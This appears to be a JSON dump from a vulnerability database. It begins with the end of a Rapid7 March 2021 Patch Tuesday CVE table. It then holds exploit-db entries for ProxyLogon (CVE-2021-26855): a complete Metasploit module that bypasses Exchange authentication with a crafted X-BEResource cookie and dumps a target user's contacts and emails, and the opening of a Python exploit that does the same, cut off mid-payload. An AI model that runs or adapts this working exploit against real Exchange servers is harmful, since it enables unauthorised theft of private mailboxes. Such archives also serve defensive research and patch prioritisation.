Microsoft Office Remote Code Execution Vulnerability | No | No | 7.6 | Yes \n[CVE-2021-27058](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27058>) | Microsoft Office ClickToRun Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27053](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27053>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27054](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27054>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n \n## SQL Server Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-26859](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26859>) | Microsoft Power BI Information Disclosure Vulnerability | No | No | 7.7 | Yes \n \n## Windows Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-26900](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26900>) | Windows Win32k Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26863](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26863>) | Windows Win32k Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2021-26871](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26871>) | Windows WalletService Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26885](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26885>) | Windows WalletService Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26864](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26864>) | Windows Virtual Registry Provider Elevation of Privilege Vulnerability | No | No | 8.4 | No \n[CVE-2021-1729](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1729>) | Windows Update Stack Setup Elevation of Privilege Vulnerability | No | No | 7.1 | No \n[CVE-2021-26889](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26889>) | Windows Update Stack Elevation of Privilege Vulnerability | No | No | 7.1 | No \n[CVE-2021-26866](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26866>) | Windows Update Service Elevation of Privilege Vulnerability | No | No | 7.1 | No \n[CVE-2021-26870](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26870>) | Windows Projected File System Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26874](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26874>) | Windows Overlay Filter Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26879](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26879>) | Windows NAT Denial of Service Vulnerability | No | No | 7.5 | No \n[CVE-2021-26884](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26884>) | Windows Media Photo Codec Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-26867](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26867>) | Windows Hyper-V Remote Code Execution Vulnerability | No | No | 9.9 | Yes \n[CVE-2021-26868](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26868>) | Windows Graphics Component Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26892](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26892>) | Windows Extensible Firmware Interface Security Feature Bypass Vulnerability | No | No | 6.2 | No \n[CVE-2021-24090](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24090>) | Windows Error Reporting Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26865](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26865>) | Windows Container Execution Agent Elevation of Privilege Vulnerability | No | No | 8.8 | No \n[CVE-2021-26891](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26891>) | Windows Container Execution Agent Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26860](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26860>) | Windows App-V Overlay Filter Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-27066](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27066>) | Windows Admin Center Security Feature Bypass Vulnerability | No | No | 4.3 | No \n[CVE-2021-27070](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27070>) | Windows 10 Update Assistant Elevation of Privilege Vulnerability | No | No | 7.3 | No \n[CVE-2021-26886](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26886>) | User Profile Service Denial of Service Vulnerability | No | No | 5.5 | No \n[CVE-2021-26880](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26880>) | Storage Spaces Controller Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26876](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26876>) | OpenType Font Parsing Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-24089](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24089>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-26902](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26902>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27061](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27061>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-24110](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24110>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27047](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27047>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27048](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27048>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27049](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27049>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27050](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27050>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27051](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27051>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27062](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27062>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-24095](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24095>) | DirectX Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2021-26890](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26890>) | Application Virtualization Remote Code Execution Vulnerability | No | No | 7.8 | No \n \n## Windows ESU Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-27077](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27077>) | Windows Win32k Elevation of Privilege Vulnerability | No | Yes | 7.8 | No \n[CVE-2021-26875](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26875>) | Windows Win32k Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26873](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26873>) | Windows User Profile Service Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2021-26899](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26899>) | Windows UPnP Device Host Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1640](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1640>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-26878](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26878>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26862](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26862>) | Windows Installer Elevation of Privilege Vulnerability | No | No | 6.3 | No \n[CVE-2021-26861](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26861>) | Windows Graphics Component Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-24107](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24107>) | Windows Event Tracing Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-26872](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26872>) | Windows Event Tracing Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26898](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26898>) | Windows Event Tracing Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26901](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26901>) | Windows Event Tracing Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26897](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26897>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2021-26877](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26877>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2021-26893](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26893>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2021-26894](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26894>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2021-26895](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26895>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2021-26896](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26896>) | Windows DNS Server Denial of Service Vulnerability | No | No | 7.5 | Yes \n[CVE-2021-27063](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27063>) | Windows DNS Server Denial of Service Vulnerability | No | No | 7.5 | Yes \n[CVE-2021-26869](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26869>) | Windows ActiveX Installer Service Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-26882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26882>) | Remote Access API Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26881](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26881>) | Microsoft Windows Media Foundation Remote Code Execution Vulnerability | No | No | 7.5 | No \n[CVE-2021-26887](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26887>) | Microsoft Windows Folder Redirection Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n \n## Summary Graphs\n\n", "cvss3": {}, "published": "2021-03-09T22:13:03", "type": "rapid7blog", "title": "Patch Tuesday - March 2021", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-27844", "CVE-2021-1640", "CVE-2021-1729", "CVE-2021-21159", "CVE-2021-21160", "CVE-2021-21161", "CVE-2021-21162", "CVE-2021-21163", "CVE-2021-21164", "CVE-2021-21165", "CVE-2021-21166", "CVE-2021-21167", "CVE-2021-21168", "CVE-2021-21169", "CVE-2021-21170", "CVE-2021-21171", "CVE-2021-21172", "CVE-2021-21173", "CVE-2021-21174", "CVE-2021-21175", "CVE-2021-21176", "CVE-2021-21177", "CVE-2021-21178", "CVE-2021-21179", "CVE-2021-21180", "CVE-2021-21181", "CVE-2021-21182", "CVE-2021-21183", "CVE-2021-21184", "CVE-2021-21185", "CVE-2021-21186", "CVE-2021-21187", "CVE-2021-21188", "CVE-2021-21189", "CVE-2021-21190", "CVE-2021-21300", "CVE-2021-24089", "CVE-2021-24090", "CVE-2021-24095", "CVE-2021-24104", "CVE-2021-24107", "CVE-2021-24108", "CVE-2021-24110", "CVE-2021-26411", "CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-26859", "CVE-2021-26860", "CVE-2021-26861", "CVE-2021-26862", "CVE-2021-26863", "CVE-2021-26864", "CVE-2021-26865", "CVE-2021-26866", "CVE-2021-26867", "CVE-2021-26868", "CVE-2021-26869", "CVE-2021-26870", "CVE-2021-26871", "CVE-2021-26872", "CVE-2021-26873", "CVE-2021-26874", "CVE-2021-26875", "CVE-2021-26876", "CVE-2021-26877", "CVE-2021-26878", "CVE-2021-26879", "CVE-2021-26880", "CVE-2021-26881", "CVE-2021-26882", "CVE-2021-26884", "CVE-2021-26885", "CVE-2021-26886", "CVE-2021-26887", "CVE-2021-26889", "CVE-2021-26890", "CVE-2021-26891", "CVE-2021-26892", "CVE-2021-26893", "CVE-2021-26894", "CVE-2021-26895", "CVE-2021-26896", "CVE-2021-26897", "CVE-2021-26898", "CVE-2021-26899", "CVE-2021-26900", "CVE-2021-26901", "CVE-2021-26902", "CVE-2021-27047", "CVE-2021-27048", "CVE-2021-27049", "CVE-2021-27050", "CVE-2021-27051", "CVE-2021-27052", "CVE-2021-27053", "CVE-2021-27054", "CVE-2021-27055", "CVE-2021-27056", "CVE-2021-27057", "CVE-2021-27058", "CVE-2021-27059", "CVE-2021-27060", "CVE-2021-27061", "CVE-2021-27062", "CVE-2021-27063", "CVE-2021-27065", "CVE-2021-27066", "CVE-2021-27070", "CVE-2021-27074", "CVE-2021-27075", "CVE-2021-27076", "CVE-2021-27077", "CVE-2021-27078", "CVE-2021-27080", "CVE-2021-27081", "CVE-2021-27082", "CVE-2021-27083", "CVE-2021-27084", "CVE-2021-27085"], "modified": "2021-03-09T22:13:03", "id": "RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53", "href": "https://blog.rapid7.com/2021/03/09/patch-tuesday-march-2021/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2022-08-16T06:04:56", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-21T00:00:00", "type": "exploitdb", "title": "Microsoft Exchange 2019 - Unauthenticated Email Download (Metasploit)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2021-26855", "CVE-2021-26855", "CVE-2021-27065"], "modified": "2021-05-21T00:00:00", "id": "EDB-ID:49895", "href": "https://www.exploit-db.com/exploits/49895", "sourceData": "# Exploit Title: Microsoft Exchange 2019 - Unauthenticated Email Download (Metasploit)\r\n# Date: 2021-03-02\r\n# Exploit Author: RAMELLA S\u00e9bastien\r\n# Vendor Homepage: https://microsoft.com\r\n# Version: This vulnerability affects (Exchange 2013 Versions < 15.00.1497.012,\r\n Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009,\r\n Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010).\r\n# Tested on: Microsoft Windows 2012 R2 - Exchange 2016\r\n\r\n##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\n# begin auxiliary class\r\nclass MetasploitModule < Msf::Auxiliary\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'Microsoft Exchange ProxyLogon Collector',\r\n 'Description' => %q{\r\n This module scan for a vulnerability on Microsoft Exchange Server that\r\n allows an attacker bypassing the authentication and impersonating as the\r\n admin (CVE-2021-26855).\r\n\r\n By chaining this bug with another post-auth arbitrary-file-write\r\n vulnerability to get code execution (CVE-2021-27065).\r\n\r\n As a result, an unauthenticated attacker can execute arbitrary commands on\r\n Microsoft Exchange Server.\r\n\r\n This vulnerability affects (Exchange 2013 Versions < 15.00.1497.012,\r\n Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009,\r\n Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010).\r\n\r\n All components are vulnerable by default.\r\n },\r\n 'Author' => [\r\n 'mekhalleh (RAMELLA S\u00e9bastien)' # Module author (Zeop Entreprise)\r\n ],\r\n 'References' => [\r\n ['CVE', '2021-26855'],\r\n ['LOGO', 'https://proxylogon.com/images/logo.jpg'],\r\n ['URL', 'https://proxylogon.com/'],\r\n ['URL', 'https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse'],\r\n ['URL', 'http://aka.ms/exchangevulns']\r\n ],\r\n 'DisclosureDate' => '2021-03-02',\r\n 'License' => MSF_LICENSE,\r\n 'DefaultOptions' => {\r\n 'RPORT' => 443,\r\n 'SSL' => true\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['ProxyLogon']\r\n }\r\n )\r\n )\r\n\r\n register_options([\r\n OptString.new('EMAIL', [true, 'The email account what you want dump']),\r\n OptString.new('FOLDER', [true, 'The email folder what you want dump', 'inbox']),\r\n OptString.new('SERVER_NAME', [true, 'The name of secondary internal Exchange server targeted'])\r\n ])\r\n\r\n register_advanced_options([\r\n OptInt.new('MaxEntries', [false, 'Override the maximum number of object to dump', 512])\r\n ])\r\n end\r\n\r\n XMLNS = { 't' => 'http://schemas.microsoft.com/exchange/services/2006/types' }.freeze\r\n\r\n def grab_contacts\r\n response = send_xml(soap_findcontacts)\r\n xml = Nokogiri::XML.parse(response.body)\r\n\r\n data = xml.xpath('//t:Contact', XMLNS)\r\n if data.empty?\r\n print_status(' - the user has no contacts')\r\n else\r\n write_loot(data.to_s)\r\n end\r\n end\r\n\r\n def grab_emails(total_count)\r\n # get the emails list of the target folder.\r\n response = send_xml(soap_maillist(total_count))\r\n xml = Nokogiri::XML.parse(response.body)\r\n\r\n # iteration to download the emails.\r\n xml.xpath('//t:ItemId', XMLNS).each do |item|\r\n print_status(\" - download item: #{item.values[1]}\")\r\n response = send_xml(soap_download(item.values[0], item.values[1]))\r\n xml = Nokogiri::XML.parse(response.body)\r\n\r\n message = xml.at_xpath('//t:MimeContent', XMLNS).content\r\n write_loot(Rex::Text.decode_base64(message))\r\n end\r\n end\r\n\r\n def send_xml(data)\r\n uri = normalize_uri('ecp', 'temp.js')\r\n\r\n received = send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => uri,\r\n 'cookie' => \"X-BEResource=#{datastore['SERVER_NAME']}/EWS/Exchange.asmx?a=~3;\",\r\n 'ctype' => 'text/xml; charset=utf-8',\r\n 'data' => data\r\n )\r\n fail_with(Failure::Unknown, 'Server did not respond in an expected way') unless received\r\n\r\n received\r\n end\r\n\r\n def soap_download(id, change_key)\r\n <<~SOAP\r\n <?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n <soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\r\n xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\"\r\n xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\"\r\n xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\r\n <soap:Body>\r\n <m:GetItem>\r\n <m:ItemShape>\r\n <t:BaseShape>IdOnly</t:BaseShape>\r\n <t:IncludeMimeContent>true</t:IncludeMimeContent>\r\n </m:ItemShape>\r\n <m:ItemIds>\r\n <t:ItemId Id=\"#{id}\" ChangeKey=\"#{change_key}\" />\r\n </m:ItemIds>\r\n </m:GetItem>\r\n </soap:Body>\r\n </soap:Envelope>\r\n SOAP\r\n end\r\n\r\n def soap_findcontacts\r\n <<~SOAP\r\n <?xml version='1.0' encoding='utf-8'?>\r\n <soap:Envelope\r\n xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'\r\n xmlns:t='http://schemas.microsoft.com/exchange/services/2006/types'\r\n xmlns:m='http://schemas.microsoft.com/exchange/services/2006/messages'\r\n xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'>\r\n <soap:Body>\r\n <m:FindItem Traversal='Shallow'>\r\n <m:ItemShape>\r\n <t:BaseShape>AllProperties</t:BaseShape>\r\n </m:ItemShape>\r\n <m:IndexedPageItemView MaxEntriesReturned=\"#{datastore['MaxEntries']}\" Offset=\"0\" BasePoint=\"Beginning\" />\r\n <m:ParentFolderIds>\r\n <t:DistinguishedFolderId Id='contacts'>\r\n <t:Mailbox>\r\n <t:EmailAddress>#{datastore['EMAIL']}</t:EmailAddress>\r\n </t:Mailbox>\r\n </t:DistinguishedFolderId>\r\n </m:ParentFolderIds>\r\n </m:FindItem>\r\n </soap:Body>\r\n </soap:Envelope>\r\n SOAP\r\n end\r\n\r\n def soap_mailnum\r\n <<~SOAP\r\n <?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n <soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\r\n xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\"\r\n xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\"\r\n xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\r\n <soap:Body>\r\n <m:GetFolder>\r\n <m:FolderShape>\r\n <t:BaseShape>Default</t:BaseShape>\r\n </m:FolderShape>\r\n <m:FolderIds>\r\n <t:DistinguishedFolderId Id=\"#{datastore['FOLDER']}\">\r\n <t:Mailbox>\r\n <t:EmailAddress>#{datastore['EMAIL']}</t:EmailAddress>\r\n </t:Mailbox>\r\n </t:DistinguishedFolderId>\r\n </m:FolderIds>\r\n </m:GetFolder>\r\n </soap:Body>\r\n </soap:Envelope>\r\n SOAP\r\n end\r\n\r\n def soap_maillist(max_entries)\r\n <<~SOAP\r\n <?xml version='1.0' encoding='utf-8'?>\r\n <soap:Envelope\r\n xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'\r\n xmlns:t='http://schemas.microsoft.com/exchange/services/2006/types'\r\n xmlns:m='http://schemas.microsoft.com/exchange/services/2006/messages'\r\n xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'>\r\n <soap:Body>\r\n <m:FindItem Traversal='Shallow'>\r\n <m:ItemShape>\r\n <t:BaseShape>AllProperties</t:BaseShape>\r\n </m:ItemShape>\r\n <m:IndexedPageItemView MaxEntriesReturned=\"#{max_entries}\" Offset=\"0\" BasePoint=\"Beginning\" />\r\n <m:ParentFolderIds>\r\n <t:DistinguishedFolderId Id='#{datastore['FOLDER']}'>\r\n <t:Mailbox>\r\n <t:EmailAddress>#{datastore['EMAIL']}</t:EmailAddress>\r\n </t:Mailbox>\r\n </t:DistinguishedFolderId>\r\n </m:ParentFolderIds>\r\n </m:FindItem>\r\n </soap:Body>\r\n </soap:Envelope>\r\n SOAP\r\n end\r\n\r\n def write_loot(data)\r\n loot_path = store_loot('', 'text/plain', datastore['RHOSTS'], data, '', '')\r\n print_good(\" - file saved to #{loot_path}\")\r\n end\r\n\r\n def run\r\n # get the informations about the targeted user account.\r\n response = send_xml(soap_mailnum)\r\n if response.body =~ /Success/\r\n print_status('Connection to the server is successful')\r\n print_status(\" - selected account: #{datastore['EMAIL']}\\n\")\r\n\r\n # grab contacts.\r\n print_status('Attempt to dump contacts list for this user')\r\n grab_contacts\r\n\r\n print_line\r\n\r\n # grab emails.\r\n print_status('Attempt to dump emails for this user')\r\n xml = Nokogiri::XML.parse(response.body)\r\n folder_id = xml.at_xpath('//t:FolderId', XMLNS).values\r\n print_status(\" - selected folder: #{datastore['FOLDER']} (#{folder_id[0]})\")\r\n\r\n total_count = xml.at_xpath('//t:TotalCount', XMLNS).content\r\n print_status(\" - number of email found: #{total_count}\")\r\n\r\n if total_count.to_i > datastore['MaxEntries']\r\n print_warning(\" - number of email recaluled due to max entries: #{datastore['MaxEntries']}\")\r\n total_count = datastore['MaxEntries'].to_s\r\n end\r\n grab_emails(total_count)\r\n end\r\n end\r\n\r\nend", "sourceHref": "https://www.exploit-db.com/download/49895", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-16T06:04:57", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-18T00:00:00", "type": "exploitdb", "title": "Microsoft Exchange 2019 - Unauthenticated Email Download", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2021-26855", "CVE-2021-26855"], "modified": "2021-05-18T00:00:00", "id": "EDB-ID:49879", "href": "https://www.exploit-db.com/exploits/49879", "sourceData": "# Exploit Title: Microsoft Exchange 2019 - Unauthenticated Email Download\r\n# Date: 03-11-2021\r\n# Exploit Author: Gonzalo Villegas a.k.a Cl34r\r\n# Vendor Homepage: https://www.microsoft.com/\r\n# Version: OWA Exchange 2013 - 2019\r\n# Tested on: OWA 2016\r\n# CVE : CVE-2021-26855\r\n# Details: checking users mailboxes and automated downloads of emails\r\n\r\nimport requests\r\nimport argparse\r\nimport time\r\n\r\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\r\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\r\n\r\n__proxies__ = {\"http\": \"http://127.0.0.1:8080\",\r\n \"https\": \"https://127.0.0.1:8080\"} # for debug on proxy\r\n\r\n\r\n# needs to specifies mailbox, will return folder Id if account exists\r\npayload_get_folder_id = \"\"\"<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n <soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" \r\n xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\" \r\n xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" \r\n xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\r\n <soap:Body>\r\n <m:GetFolder>\r\n <m:FolderShape>\r\n <t:BaseShape>AllProperties</t:BaseShape>\r\n </m:FolderShape>\r\n <m:FolderIds>\r\n <t:DistinguishedFolderId Id=\"inbox\">\r\n <t:Mailbox>\r\n <t:EmailAddress>{}</t:EmailAddress>\r\n </t:Mailbox>\r\n </t:DistinguishedFolderId>\r\n </m:FolderIds>\r\n </m:GetFolder>\r\n </soap:Body>\r\n </soap:Envelope>\r\n\r\n\"\"\"\r\n# needs to specifies Folder Id and ChangeKey, will return a list of messages Ids (emails)\r\npayload_get_items_id_folder = \"\"\"<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n <soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" \r\n xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\" \r\n xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" \r\n xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\r\n <soap:Body>\r\n <m:FindItem Traversal=\"Shallow\">\r\n <m:ItemShape>\r\n 